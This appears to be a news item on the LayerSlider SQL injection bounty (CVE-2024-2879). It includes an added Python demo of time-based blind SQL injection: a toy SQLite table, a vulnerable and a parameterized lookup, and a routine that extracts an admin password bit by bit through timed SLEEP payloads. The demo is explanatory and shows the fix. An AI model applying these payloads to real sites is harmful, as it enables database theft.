A researcher received a $5,500 bug bounty for discovering a vulnerability (CVE-2024-2879) in LayerSlider, a plug-in with more than a million active installations.
However, exploiting the flaw requires a “time-based blind approach” on the part of attackers to extract database information, which is “an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities,” according to Wordfence.
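To make the quoted technique concrete, the following is an added example written for this page; it is not LayerSlider's code, not Wordfence's proof of concept, and says nothing about how the real flaw is reached. It builds a constructed in-memory SQLite table shaped like wp_users, registers a sleep() function so SQLite can stand in for MySQL's SLEEP(), and shows a lookup that concatenates its parameter into SQL next to one that binds it. The extract() routine is the time-based blind method itself: it asks one yes/no question per bit of each character, never sees a result set, and reads the answer from the response time alone. Every name in it (make_db, vulnerable_lookup, safe_lookup, extract, the SLEEP_SECONDS constant) is an assumption of this example.

```python
import sqlite3
import time

# Constructed secret standing in for an admin password hash; the
# whole schema below is a toy, not WordPress or LayerSlider code.
SECRET = "s3cr"
SLEEP_SECONDS = 0.05  # delay the injected CASE triggers when a bit is set


def make_db():
    """Build the toy database with a single admin row."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the toy behaves like MySQL.
    conn.create_function("sleep", 1, lambda n: time.sleep(n) or 0)
    conn.execute(
        "CREATE TABLE wp_users(id INTEGER, user_login TEXT, user_pass TEXT)"
    )
    conn.execute(
        "INSERT INTO wp_users VALUES (1, 'admin', ?)", (SECRET,)
    )
    return conn


def vulnerable_lookup(conn, slider_id):
    """Vulnerable pattern: the request parameter is concatenated into SQL."""
    sql = "SELECT id FROM wp_users WHERE id = " + str(slider_id)
    return conn.execute(sql).fetchall()


def safe_lookup(conn, slider_id):
    """Fixed pattern: a bound parameter is never parsed as SQL."""
    return conn.execute(
        "SELECT id FROM wp_users WHERE id = ?", (slider_id,)
    ).fetchall()


def timed(conn, lookup, payload):
    """Return how long the lookup took; the result rows are ignored."""
    start = time.monotonic()
    try:
        lookup(conn, payload)
    except sqlite3.Error:
        pass  # a blind attacker gets no error text either, only the clock
    return time.monotonic() - start


def extract(conn, lookup, length, threshold=SLEEP_SECONDS / 2):
    """Recover `length` characters of the admin password one bit at a time.

    Each payload is a valid id followed by a conditional subquery that
    sleeps only when the tested bit of the target character is set.
    A slow response means 1, a fast one means 0.
    """
    recovered = ""
    for pos in range(1, length + 1):
        code = 0
        for bit in range(6, -1, -1):  # 7 bits cover printable ASCII
            payload = (
                "1 AND (SELECT CASE WHEN "
                "(unicode(substr(user_pass,%d,1)) & %d) "
                "THEN sleep(%g) ELSE 0 END "
                "FROM wp_users WHERE user_login='admin')"
                % (pos, 1 << bit, SLEEP_SECONDS)
            )
            if timed(conn, lookup, payload) > threshold:
                code |= 1 << bit
        recovered += chr(code)
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", repr(extract(db, vulnerable_lookup, len(SECRET))))
    print("parameterized:", repr(extract(db, safe_lookup, len(SECRET))))
```

Run against vulnerable_lookup the routine recovers the secret with 7 timed requests per character and no data ever returned in the response body, which is why this is called blind; against safe_lookup the same payloads are compared to the id column as an ordinary string, nothing sleeps, and every bit reads as 0. The threshold is half the injected delay, which is comfortable for an in-memory database; over a real network the attacker has to pick a larger delay or repeat measurements to beat jitter, and that is the main thing that makes the technique slower, not harder.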
I wouldn’t call that intricate. It’s pretty standard to try it since you get immediate feedback that you can inject SQL statements.